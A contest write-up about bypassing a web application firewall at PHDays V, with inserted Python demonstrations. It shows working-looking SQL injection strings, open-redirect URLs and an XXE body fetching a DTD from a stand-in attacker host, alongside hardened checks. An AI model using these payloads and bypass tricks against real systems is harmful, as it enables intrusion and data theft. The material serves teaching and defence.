June 3, 2015

WAF Bypass at Positive Hack Days V


As it did last year, the PHDays forum on information security hosted the WAF Bypass contest again this year. Participants tried to bypass the protection of PT Application Firewall, Positive Technologies' product. For the contest, the organizers built the site Choo Roads, which contained common vulnerabilities: Cross-Site Scripting, SQL Injection, XML External Entities Injection, and Open Redirect. Exploiting a vulnerability yielded a flag (an MD5 hash) and earned points. Flags were placed in the file system, in the database, and in cookie parameters; the cookie flags could only be reached through a bot, built with Selenium, that simulated a user visiting links supplied by participants.

Although the WAF configuration used in the contest allowed bypasses, some uncommon solutions were presented as well. That was actually the goal of the contest: participants got to try their hand at bypassing protection mechanisms, and we get to improve our product based on the results. Let's look at the vulnerabilities and the bypass techniques.

Warmup

The vulnerability was in the script that tracked user activity on the site.

POST /online.php HTTP/1.1
Host: choo-choo.phdays.com
Connection: keep-alive
Content-Length: 24
Content-Type: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36

{"timestamp":1432906707}

The timestamp value from the JSON body of the POST request was inserted into the SQL query without validation.
To bypass the check, it was enough to change Content-Type to text/xml: the WAF then no longer treated the POST data as JSON, so the JSON field check was not applied, while the back end still parsed the body as JSON.
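The mechanism behind this bypass, as an added example (not code from the page or from PT Application Firewall): a model WAF whose JSON inspection is keyed off the declared Content-Type, next to a hardened variant that decodes the body the way the back end will regardless of what the client declares. The SQL signature, the hostile body, and the back-end query text are assumptions for illustration; only the benign request body comes from the page.

```python
import json
import re

# Patterns a WAF might match inside decoded JSON values. Constructed for
# this example; the real firewall rules are not shown on the page.
SQLI_SIGNATURE = re.compile(r"(?i)\b(union|select|sleep|benchmark)\b|--|'")

# Bodies for online.php. The first is the legitimate request from the page;
# the second carries an assumed SQL payload in the same field.
BENIGN_BODY = '{"timestamp":1432906707}'
HOSTILE_BODY = '{"timestamp":"0 UNION SELECT flag FROM flags"}'


def content_type(headers):
    """Media type only, ignoring parameters such as charset."""
    return headers.get("Content-Type", "").split(";")[0].strip().lower()


def json_values(body):
    """Decode body as a JSON object and return its values as strings,
    or None when the body is not a JSON object."""
    try:
        fields = json.loads(body)
    except ValueError:
        return None
    if not isinstance(fields, dict):
        return None
    return [str(v) for v in fields.values()]


def waf_json_only(headers, body):
    """Model of the bypassed configuration: the JSON parser, and with it the
    field-level checks, runs only when the client declares application/json."""
    if content_type(headers) != "application/json":
        return "allow"          # body is never decoded, nothing to match on
    values = json_values(body)
    if values and any(SQLI_SIGNATURE.search(v) for v in values):
        return "block"
    return "allow"


def waf_parse_like_backend(headers, body):
    """Hardened model: decode the body the way the back end will, whatever
    Content-Type says, and fall back to the raw body if decoding fails."""
    values = json_values(body)
    if values is None:
        values = [body]
    if any(SQLI_SIGNATURE.search(v) for v in values):
        return "block"
    return "allow"


def backend_query(headers, body):
    """Model of the vulnerable online.php: it trusts the body to be JSON no
    matter what Content-Type says and interpolates the field into SQL.
    The query text is an assumption; the page does not show it."""
    fields = json.loads(body)
    return "UPDATE online SET last_seen=%s" % fields["timestamp"]


if __name__ == "__main__":
    json_hdr = {"Content-Type": "application/json"}
    xml_hdr = {"Content-Type": "text/xml"}
    print("declared json, old WAF:", waf_json_only(json_hdr, HOSTILE_BODY))
    print("declared xml,  old WAF:", waf_json_only(xml_hdr, HOSTILE_BODY))
    print("declared xml,  hardened:", waf_parse_like_backend(xml_hdr, HOSTILE_BODY))
    print("back end builds:", backend_query(xml_hdr, HOSTILE_BODY))
```

The general rule this illustrates: any inspection that is switched on by a client-controlled header is only as strong as the back end's respect for that header. If the application parses the body as JSON unconditionally, the WAF has to do the same.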

XSD validation

The site had a ticket search form that built an XML request and sent it to the back end.
The request was validated against an XSD.

According to the schema, the id attribute had to be exactly 35 characters long. The attribute value was then added into the SQL query without any further validation, so the bypass required a vector that satisfied the XSD constraints.
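Why a schema-valid value is not a safe value, as an added example (not the contest code): a stand-in for the WAF's XSD check that enforces only the 35-character facet the page describes, a back end that interpolates the validated attribute into SQL, and a payload padded to exactly 35 characters so that the schema check passes and the query still returns the flag. The element name, table layout, flag value, and the parameterized fix are assumptions for illustration.

```python
import sqlite3
import xml.etree.ElementTree as ET

ID_LENGTH = 35                   # the xs:length facet described on the page
LEGIT_ID = "TKT" + "0" * 32      # a well-formed 35-character ticket id (constructed)


def open_db():
    """In-memory stand-in for the back-end database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tickets(id TEXT, route TEXT);
        CREATE TABLE flags(flag TEXT);
        INSERT INTO flags VALUES ('d41d8cd98f00b204e9800998ecf8427e');
    """)
    db.execute("INSERT INTO tickets VALUES (?, ?)", (LEGIT_ID, "Moscow-Tver"))
    return db


def request_xml(ticket_id):
    """Request as the search form would build it. The element name is
    assumed; the page only names the id attribute."""
    return '<ticket id="%s"/>' % ticket_id.replace("&", "&amp;").replace('"', "&quot;")


def xsd_check(xml_text):
    """Stand-in for the XSD validation: only the facet the page mentions is
    modelled, id must be exactly ID_LENGTH characters. Returns the id."""
    root = ET.fromstring(xml_text)
    ticket_id = root.get("id")
    if ticket_id is None or len(ticket_id) != ID_LENGTH:
        raise ValueError("schema violation: id must be %d characters" % ID_LENGTH)
    return ticket_id


def is_schema_valid(xml_text):
    try:
        xsd_check(xml_text)
        return True
    except (ValueError, ET.ParseError):
        return False


def search_vulnerable(db, xml_text):
    """Back end as described on the page: the schema-valid value goes
    straight into the SQL string."""
    ticket_id = xsd_check(xml_text)
    sql = "SELECT route FROM tickets WHERE id='%s'" % ticket_id
    return [row[0] for row in db.execute(sql)]


def search_fixed(db, xml_text):
    """Same schema check, but the value is bound as a parameter."""
    ticket_id = xsd_check(xml_text)
    rows = db.execute("SELECT route FROM tickets WHERE id=?", (ticket_id,))
    return [row[0] for row in rows]


def schema_valid_payload():
    """Injection padded with spaces to exactly 35 characters so xsd_check
    passes; the query's closing quote ends up behind the -- comment."""
    base = "' UNION SELECT flag FROM flags--"
    return base + " " * (ID_LENGTH - len(base))


if __name__ == "__main__":
    db = open_db()
    payload = request_xml(schema_valid_payload())
    print("schema accepts payload:", is_schema_valid(payload))
    print("vulnerable search returns:", search_vulnerable(db, payload))
    print("parameterized search returns:", search_fixed(db, payload))
```

The length facet constrains the shape of the value, not its meaning to the SQL engine; a pattern facet would be tighter, but the durable fix is on the back end, where the value must be bound rather than concatenated.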

Open Redirect



The vulnerability was in the "to" parameter of the script redirect.php. The flag was placed in the fragment part of the URL to which the bot was redirected, i.e. it was never sent to the server. To get the flag, you had to send the bot to another site hosting a page that reads the value from location.hash and sends it to a logger.

Bypassing options:

http://choo-choo.phdays.com/redirect.php?to=phdays.com:asd@host.com
http://choo-choo.phdays.com/redirect.php?to=http://ahack.ru%23.phdays.com/
http://choo-choo.phdays.com/redirect.php?to=http%3a//www.samincube.com%3f\..\\www.phdays.com
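What the three vectors above have in common, as an added example (not the contest's or the product's code): each makes the trusted domain appear inside the value while the URL parser, and therefore the browser, ends up somewhere else. The block contrasts a substring check with one that parses first and compares the parsed host against an allowlist. The allowlist is an assumption; the vectors are the page's, after percent-decoding.

```python
from urllib.parse import unquote, urlsplit

# Hosts the redirect is allowed to send users to (assumed allowlist).
ALLOWED_HOSTS = {"phdays.com", "www.phdays.com", "choo-choo.phdays.com"}

# The three bypass values from the page, as redirect.php would see them after
# percent-decoding the query string (%3a -> ':', %23 -> '#', %3f -> '?').
VECTORS = [
    unquote("phdays.com:asd@host.com"),
    unquote("http://ahack.ru%23.phdays.com/"),
    unquote(r"http%3a//www.samincube.com%3f\..\\www.phdays.com"),
]


def naive_check(to):
    """The kind of check all three vectors defeat: the trusted domain merely
    has to appear somewhere in the value."""
    return "phdays.com" in to


def target_host(to, assume_http=False):
    """Host the browser will actually go to, according to the URL parser.
    With assume_http a scheme-less value is treated the way many redirect
    scripts end up treating it: prefixed with http://."""
    if assume_http and "://" not in to:
        to = "http://" + to
    return urlsplit(to).hostname


def strict_check(to):
    """Parse first, then compare the parsed host exactly against the
    allowlist; refuse userinfo and anything that is not plain http(s).
    Vector 1 then fails on userinfo (phdays.com:asd is user:password),
    vector 2 on host ahack.ru, vector 3 on host www.samincube.com."""
    parts = urlsplit(to)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False
    return parts.hostname is not None and parts.hostname.lower() in ALLOWED_HOSTS


if __name__ == "__main__":
    for v in VECTORS:
        print("%r: naive=%s host=%s strict=%s" % (
            v, naive_check(v), target_host(v, assume_http=True), strict_check(v)))
```

Note that the first vector has no scheme at all: urlsplit reads "phdays.com" as the scheme and yields no host, which is why strict_check rejects it outright, and once an http:// prefix is added the "phdays.com:asd" part becomes userinfo and the host is host.com. Where the application only ever needs to redirect within itself, accepting a relative path and refusing anything with a scheme or netloc is simpler still.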

XML External Entities Injection

The script that handled XML data was vulnerable to XXE. Bypassing required pulling the external entity in through a parameter entity rather than declaring it directly.

The filter could also be bypassed by sending the request in UTF-16.
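Why UTF-16 gets past a signature check, as an added example (not code from the page or the product): a byte-level match for <!ENTITY on the raw body, a variant that first decodes the body the way an XML parser does (BOM, then the byte pattern of the opening "<", then the encoding declaration), and the back end's own parser accepting the UTF-16 request unchanged. The XXE body follows the parameter-entity shape described above; its URL, the element names and the benign request are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed XXE body in the shape the page describes: the external entity
# is pulled in through a parameter entity. URL and element names are assumed.
XXE_BODY = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE search [\n'
    '  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">\n'
    '  %dtd;\n'
    ']>\n'
    '<search><query>&flag;</query></search>\n'
)

# Legitimate request the back end must keep accepting, declared as UTF-16.
BENIGN_BODY = (
    '<?xml version="1.0" encoding="UTF-16"?>'
    '<search><query>Moscow</query></search>'
)

NAIVE_SIGNATURE = re.compile(rb"<!ENTITY\b")
TEXT_SIGNATURE = re.compile(r"<!ENTITY\b")


def naive_filter(body):
    """Signature check on the bytes as received. UTF-16 puts a NUL between
    every ASCII character, so the byte pattern never matches."""
    return "block" if NAIVE_SIGNATURE.search(body) else "allow"


def xml_encoding(body):
    """Encoding an XML parser would pick: BOM first, then the byte pattern
    of the '<' that opens the declaration, then the declaration itself."""
    if body[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return "utf-16"             # the codec consumes the BOM
    if body[:3] == b"\xef\xbb\xbf":
        return "utf-8-sig"
    if body[:2] == b"<\x00":
        return "utf-16-le"
    if body[:2] == b"\x00<":
        return "utf-16-be"
    m = re.match(rb"<\?xml[^>]*encoding=[\"']([\w.-]+)[\"']", body)
    return m.group(1).decode("ascii") if m else "utf-8"


def normalizing_filter(body):
    """Decode the body the way the parser will, then apply the signature."""
    text = body.decode(xml_encoding(body), errors="replace")
    return "block" if TEXT_SIGNATURE.search(text) else "allow"


def backend_query(body):
    """The back end's parser (expat, via ElementTree) handles the encoding
    transparently, which is why the WAF must normalise before matching."""
    return ET.fromstring(body).findtext("query")


if __name__ == "__main__":
    for label, body in (("utf-8", XXE_BODY.encode("utf-8")),
                        ("utf-16", XXE_BODY.encode("utf-16"))):
        print(label, "naive:", naive_filter(body), "normalizing:", normalizing_filter(body))
    print("back end reads UTF-16 request:", backend_query(BENIGN_BODY.encode("utf-16")))
```

The same decode-before-match discipline covers the parameter-entity trick only partially: once the body is in text form, a rule that refuses any DOCTYPE carrying SYSTEM or PUBLIC identifiers, or any parameter-entity reference, is a more reliable policy than matching on a single keyword. The back end should in addition disable external entity and DTD loading in its parser.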

Cross-Site Scripting

The vulnerability was in the site's search page. To obtain the flag, you had to exfiltrate the bot's cookies to a site under your control. The bypass relied on non-standard tag attributes that are processed by bootstrap-validator, which made it possible to execute JavaScript:

Or:


Results


The winner of the contest was bushwhackers: Georgy Noseevich, Andrey Petukhov, and Alexander Razdobarov. The team solved all the tasks on the first day! (They won last year's competition as well.) Mikhail Stepankin (ArtSploit) took second place, and Eldar Zaitov (kyprizel) came third. The winner received an iPad Air 2, second place received a Sony Xperia Z3, and third place received a license for Burp Suite Professional.

During the contest, 271,390 requests were blocked (twice as many as during last year's contest). This time 302 contestants registered (compared to 101 last year), but only 18 participants managed to capture at least one flag.



Thanks to everyone who took part in the contest.
